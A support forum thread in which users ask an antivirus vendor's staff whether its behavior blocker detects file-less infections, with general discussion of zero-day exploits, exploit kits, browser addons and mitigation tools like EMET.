hjlbx

Does Behavior Blocker Protect Against File-less Infections?

Recommended Posts

Behavior Blocker aka BB is used to prevent zero day threats been executed and installed on your computer. Behavior Blocker can also used as banking protection as well. But to your question what do you mean File less infection? Do you mean like legitimate file or adware file?

Share this post


Link to post
Share on other sites

We recently started updating both our scan engine as well as the behavior blocker to account for file-less infections. At the moment they won't be detected properly, unless they eventually try to establish persistence on a user's system.

Share this post


Link to post
Share on other sites

Hello Fabian,

 

I know you and other staff are hard at work making improvements...always...

 

It inspires confidence...

 

As I already have an "Anti-Exploit" solution installed my system should be reasonably well protected.

 

I just wanted to ask simply because if EIS already provided such protection then there is no need to have additional solutions installed; keep it simple...

 

Many Thanks,

 

hjlbx

Share this post


Link to post
Share on other sites

The best "anti-exploit" you can buy in my opinion is a Secunia PSI or one of the many other tools that help you keep track of which applications you have installed and whether or not there are updates available for it. If there is no vulnerable software version to begin with, there is no need for any kind of anti-exploit.

Share this post


Link to post
Share on other sites

Actually there is not always a patch for vulnerable software so keeping your software up to date does not guarantee you are safe from exploits. Exploits can go unknown for some time before being patched. Even when an exploit is discovered it is not usually patched right away. Sometimes an exploit is not patched for months after being discovered.

Share this post


Link to post
Share on other sites

Actually there is not always a patch for vulnerable software so keeping your software up to date does not guarantee you are safe from exploits. Exploits can go unknown for some time before being patched. Even when an exploit is discovered it is not usually patched right away. Sometimes an exploit is not patched for months after being discovered.

If you are important enough that someone would be willing to spend tens of thousands of US dollars on a reliable zero-day exploit to get your system infected, this naturally won't help you. However, that simply isn't a case that any normal home users should be concerned about.

Share this post


Link to post
Share on other sites

Hello cutting_edgetech,

 

These are the measures I take to minimize any potential "Exploit":

 

1.  Use alternatives to Adobe products (Flash, Reader, Acrobat,..)

2.  Use alternatives to Microsoft products (Word, Excel, Outlook, Windows Media Player,...)  Note:  IE11 is the exception here as EAM/EIS provide protections

3.  Do not install/uninstall Oracle's Java or, especially, Java Runtime Environment (JRE) 

4.  Use an update software such as Secunia PSI and/or FileHippo updater

 

In general, malware succeeds by "exploiting" the greatest number of systems possible.  Consequently, malware artists will always target the vulnerabilities of the most widely installed applications.  So I just don't use them...

 

In my experience EAM/EIS offer a very high level of protection...

 

hjlbx

Share this post


Link to post
Share on other sites
Guest Tempus

If you are important enough that someone would be willing to spend tens of thousands of US dollars on a reliable zero-day exploit to get your system infected, this naturally won't help you. However, that simply isn't a case that any normal home users should be concerned about.

 

Exploits is a reality and a threat for normal users as well. Botnets can be installed through exploits in an non updated pc. You dont have to be a million dollar company, bút it will probably help, of course. Let's take the Caphaw Trojan which gave the opportunity to control a pc, and was installed on your pc by clicking on third-party Youtube ads,  so here was the target the so called normal user base. My point is that it is true when cutting edge tech writers " Exploits can go unknown for some time before being patched " and " Sometimes an exploit is not patched for months after being discovered" for a normal user it can be weeks/month".... and thereby leave a window of opportunity.Is it something that normal user should be concerned about? I don't think that a normal user have to lay awake at night, but an awareness and education of the importance of an overall update of your software profil/programs to minimize the attack surface for exploits is important, even for a normal user. Btw. the more sophisticated coded malware/exploits tools  has a tendency to become accessible for cyber criminals at a much lower price over time. If I have misunderstood anything then please let me know =)

Share this post


Link to post
Share on other sites

If I have misunderstood anything then please let me know =).

Yes, you missed the entire point. Of course exploits are a topic for home users. But these types of exploits are publicly known, meaning the vendors are aware of them and patches are available that you can install to no longer be vulnerable. Cutting_edgetech was referring to "unknown" exploits that only a small number of people (usually only the person who found it) but not the vendor have access to, so they can't be patched by the vendor and therefore can't be dodged by using the latest version of the vulnerable software. These kinds of exploits are highly valuable. Depending on the type of exploit and how reliable it is, we are talking about six figures on the "black market" here. Nobody will spend that kind of money to get into home users' PCs because the return of investment would be abysmal unless you use it on hundreds of thousands of PCs burning the exploit in the process.

Share this post


Link to post
Share on other sites
Guest Tempus

Yes, you missed the entire point. Of course exploits are a topic for home users. But these types of exploits are publicly known, meaning the vendors are aware of them and patches are available that you can install to no longer be vulnerable. Cutting_edgetech was referring to "unknown" exploits that only a small number of people (usually only the person who found it) but not the vendor have access to, so they can't be patched by the vendor and therefore can't be dodged by using the latest version of the vulnerable software. These kinds of exploits are highly valuable. Depending on the type of exploit and how reliable it is, we are talking about six figures on the "black market" here. Nobody will spend that kind of money to get into home users' PCs because the return of investment would be abysmal unless you use it on hundreds of thousands of PCs burning the exploit in the process.

Okay my bad,  I understand your argumentation much better now, and it makes sense...definitely. But even with publicly known exploits there will be,.... very often...,  a window of opportunity before a patch will be released from the vendor. Leaving you, potential vunebly.

Share this post


Link to post
Share on other sites

But even with publicly known exploits there will be,.... very often...,  a window of opportunity before a patch will be released from the vendor. Leaving you, potential vunebly.

In theory maybe. Realistically exploits aren't an issue for home users unless there are large campaigns going on. Most attackers don't have the resources to actually take a description of an exploit or maybe even a file exploiting a vulnerability that was leaked from a targeted attack and weaponize it for their purposes. So they too rely on readily available tools like exploit kits for example. Adoption of new exploits into such readily available tools is a lot slower than most vendors need to fix a high risk vulnerability. In fact, a lot of the exploits that made headlines this year haven't made it into exploit kits yet.

 

One of the vulnerabilities exploit kit makers tend to adopt a lot faster than other kinds of vulnerabilities are Flash vulnerabilities. CVE-2014-0569 was adopted in a particularly timely manner this year. But even there the patch was already available for a week before the first drop sites started to exploit it.

Share this post


Link to post
Share on other sites
Guest Tempus

Thanks Fabian for your opinion(s) regarding " home user and exploits.  As said, your argumentation make sense..... and is appreciated.

Fabian was is your take on browser extensions and exploits. I mean many or some browser extension from 3 party, is or can be very buggy and is often not coded with security in mind, and very often will  they run with the users full privilege. 

Share this post


Link to post
Share on other sites

Fabian was is your take on browser extensions and exploits. I mean many or some browser extension from 3 party, is or can be very buggy and is often not coded with security in mind, and very often will  they run with the users full privilege. 

Depends on what type of extensions you are talking about. Do you mean binary extensions as in "plugins" like Java or Flash or are you talking about browser addons like Adblock? It also heavily depends on the browser you are using and what you are doing as a home user. If you don't use Netflix, chances are you will never need Silverlight. If you don't play Minecraft, you will never need Java. You get the idea.

Share this post


Link to post
Share on other sites

In a way this all makes me chuckle.   First for the typical home user I agree with Fabian's assesment 1000%.  I run other security software, because I am not a typical home user.  I run my business on my computers, keep no paper records at all, have client financial information on these computers.  Since my business is already a trust business, I feel obligated to close any and all holes, even if the probably of attack is near zero.   Also a bit of research can be enlightening.  Two examples

 

1.  When the Bromium folks published their "work" they claimed to show how kernel exploits could undermine sandboxes, and almost every piece of software out there except of course theirs.  And of course it's only sold to businesses.  Well this kicked off a firestorm of OMG's, what do I do now stuff.  FInally I did a bit of reseach on kernel expolits.  Turned out better then 85% of the hits were bromium posts, the a bunch on kernel exploits in Linux, and finally a few pointing out how hard it was to write kernel exploits.  I now consider it marketing.

 

2.  Then there was the dequ epside and again people were wringing there hands.  Once I realized it came via word docs, I yawned.  EIS, plus most of my other software would have stopped it.  But then a bit of reseach pointed out, it only targeted command and control facilities, and all but two of the attacks were all in one country.  Would the typical  user of EIS/EAM be a target?  I don't think so, so Fabian's conclusions are spot on.

 

Pete

Share this post


Link to post
Share on other sites
Guest Tempus

You get the idea.

Got it.... I didn't mean binary extensions because that was more or less discussed in the previous posts .I was curious to hear your opinion about the huge numbers of browser addons, to browser such as Firefox and Chrome,. (Personally I use IE11). These browser extensions can be, in my opinion,  very buggy, they are  not so often patched , not coded with security in mind,.....  can have doubtful and obscured collection of user information etc. Are those kind of browser addons a concern regarding exploits? I guess exploitation can be on different levels. (Btw. hoped you had a great Christmas.)   =)

Share this post


Link to post
Share on other sites

With a very few exceptions those addons are usually subject to the same kind of sandboxing all JavaScript and websites are. So they are just as prone or not prone to exploits as the website rendering is. Of course a browser addon can act maliciously on purpose within the addon model that the browser provides. It is completely feasible to log form data using a malicious browser addon for example or inject all kinds of nasty code inside any website you want as a browser addon. But that won't happen "on accident".

Share this post


Link to post
Share on other sites
Guest Tempus

Thanks Fabian, I actually think I had become a bit wiser....as always, thanks for your time spent answering my posts in this thread ..... :)

Share this post


Link to post
Share on other sites

Hello Fabian,

will file-less infections be detected properly now with Emsi 10?

Java, Win and mostly Flash bugs and exploits are being discovered and implemented in kits always faster and more often..Tempus was not too wrong, in my opinion.

We hope Emsi will keep doing the great job they did till now and keep us safe also from unknown malwares.

thank you and good work!

Share this post


Link to post
Share on other sites

Fabian,

thank you.

What additional software would you recommend to properly detect file-less infections?

2. On http://support.emsisoft.com/topic/15469-oas-physical-memory-access-hips-component-question/

you said OA in general does prevent applications from writing into other processes.

Just to be sure, does Emsi AM and/OR Emsi IS offer this feature?

Thank you

Share this post


Link to post
Share on other sites

Yes, the behavior blocker detects and prevents code injection. EMET works fine for me with the default configuration. Other tools may work as well, but we don't test with them and I don't use them.

Share this post


Link to post
Share on other sites

..not sure I understood your repky correctly..

EMET is a good program to add protection against file-less infections or it doesn't cover this kind of infections ?

Thank you

Share this post


Link to post
Share on other sites

There is no tool that covers fileless infections. The point of EMET and other exploit mitigation tools is to make it harder for security vulnerabilities within applications to be exploited so it is more difficult for fileless infections to enter your system. The best approach is obviously to keep your applications up-to-date and reduce your attack surface as much as possible, by removing things like Java, Adobe Acrobat Reader or Flash from your system, or at least switch them into "click to play" mode so they aren't loaded automatically but only if you really want to. But if you can't do that for whatever reason, you can consider tools like EMET.

Share this post


Link to post
Share on other sites

Fabian, Appguard, does provide fileless infections to a degree in that it has what they call Memory guard.  It prevents an application from reading or writing to another applications memory.  I've tested it and it does work

Share this post


Link to post
Share on other sites

That isn't a protection from fileless infections either. EAM does that as well (code injection protection). It helps mitigating fileless infections, it does not stop them.

Share this post


Link to post
Share on other sites

Fabian thank you for the clear answer!

Peter, thank you for the input...I saw your point/ the discussion on wilders, that s why I checked here if Emsi Am/ Is protected from this threat or if addition tools were needed/ suggested.

I hope Emsi will find a way to protect from file-less infections one day!

Share this post


Link to post
Share on other sites

Fabian thank you for the clear answer!

Peter, thank you for the input...I saw your point/ the discussion on wilders, that s why I checked here if Emsi Am/ Is protected from this threat or if addition tools were needed/ suggested.

I hope Emsi will find a way to protect from file-less infections one day!

 

Hi pallino

 

I think you can rest easy.  If you are on Wilders you have an idea of my setup.   I've done quite a bit of playing with malware that people try and foist on me and inevitably the first one to catch it is EIS.   You are in good hands, with EMSISOFT!!

 

Pete

  • Upvote 1

Share this post


Link to post
Share on other sites

Hi pallino

I think you can rest easy. If you are on Wilders you have an idea of my setup. I've done quite a bit of playing with malware that people try and foist on me and inevitably the first one to catch it is EIS. You are in good hands, with EMSISOFT!!

Pete

Thank you Pete!

I m still reading on Wilders, I have sooo many pages open it will take me some days to read them all! :-)

I still didn't get to the part where I see your setup, on what page is it? Thank you!

I ll keep the anti-exploit with Emsi to cover more entry points and "sleep well". :-)

It s good to hear I m in good hands! :-)

Share this post


Link to post
Share on other sites

Fabian,

what did you mean before with filess infections " won't be detected properly "?

When does Emsi detect them and when not?

E.g, if a "new"/ unknown Bedep variant is dropped, will BB be able to detect it or can it only be detected through generic signature/ heuristic?

Thank you for your help and clarification !

Share this post


Link to post
Share on other sites

I don't think I can be clearer than I have already been: We don't handle fileless infections at all in realtime at the moment. There is nothing more to clarify imho.

Share this post


Link to post
Share on other sites

No, we don't. We will see the actions taking place, but since they are performed by a trusted process (like the browser that is being exploited) we will allow them to go through without notice.

Share this post


Link to post
Share on other sites

Bedap can stay undetected in memory, yes. A memory scan won't detect it, as a memory scan essentially scans the loaded files. Since there is no Bedap file, there is nothing for us to scan.

Share this post


Link to post
Share on other sites

Last question. .:-)

Isn't it possible to add a scan for all the content of the memory, indipendent if it's used by loaded files or not?

if not, why?

Thank you

Share this post


Link to post
Share on other sites

It is possible, but our signatures don't support it. Scanning memory has to account for relocations and other things taking place that change the memory content. I wouldn't rule it out entirely for the future though.

Share this post


Link to post
Share on other sites

Hello Fabian,

 

how does Emsisoft now handles filess infections?

Did something change in Emsi 11 and/or will it in the upcoming 12 or is still protecting the customer through his anti-exploit and  BB protecting from process injection?

 

Can Emsi now scan for all the content of the memory, indipendent if it's used by loaded files or not?

 

thank you

Share this post


Link to post
Share on other sites

Since Fabian hasn't answered, I'll jump in and say that I'm fairly certain we added handling for fileless infections. Fabian will know more, of course, so you may have to wait for him to comment to get more information than that.

Share this post


Link to post
Share on other sites

Thank you Arthur.

Can you pls check with Fabian

how Emsisoft now handles filess infections?

Did something change in Emsi 11 and/or will it in the upcoming 12 or is still protecting the customer through his anti-exploit and BB protecting from process injection?

Can Emsi now scan for all the content of the memory, indipendent if it's used by loaded files or not?

thank you

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.